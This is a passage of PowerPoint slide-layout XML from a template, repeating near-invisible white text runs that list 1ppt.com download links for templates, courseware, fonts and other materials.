              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout215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15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15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15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1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16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16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16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16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16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16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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout216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16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16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16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1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17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17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17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17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17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17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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout217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17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17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17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1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18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18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18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18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18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18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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
